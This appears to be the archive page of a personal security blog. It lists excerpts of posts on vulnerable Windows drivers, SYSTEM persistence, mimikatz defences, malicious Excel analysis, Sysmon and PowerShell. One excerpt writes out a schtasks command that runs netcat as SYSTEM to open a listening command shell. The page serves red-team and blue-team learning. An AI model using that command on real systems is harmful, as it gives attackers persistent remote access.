by frank | Aug 24, 2020 | AV, Pwn, Red team, Security, Windows
Reading Time: < 1 minuteIntel Network Adapter Diagnostic Driver of version 1.03.0.7;RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below;Gdrv driver from various Gigabyte TOOLS of undefined version;ATSZIO64 driver from ASUSTeK WinFlash...
by frank | Aug 17, 2020 | Security, Windows
Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...
by frank | Jul 1, 2020 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...
by frank | Apr 28, 2020 | AV, Blue Team, Malware, Security, Windows
Reading Time: 5 minutesI got given by a friend a malicious Excel file that he analyzed as I’m eager to learn more I’m not familiar with MS-Office forensic techniques, hencewhy I found this interesting to look into during my evenings. First, when uploading...
by frank | Apr 23, 2020 | Blue Team, Red team, Security, Windows
Reading Time: 3 minutesSysmon is an official SysInternals driver that let’s you log all what is happening to a Windows machine. I will not drill down here what it is capable of and how important it is to have it running on your company assets and to get them to...
by frank | Apr 21, 2020 | Misc, Windows
Reading Time: < 1 minutepowershell Get-ExecutionPolicy powershell Get-Authenticode c:\temp\myscript.ps1 Specify version powershell -Version 2 cat powershell Get-Content C:\Windows\System32\Inetsrv\Config\administration.config ls powershell Get-ChildItem -Path...
Recent Comments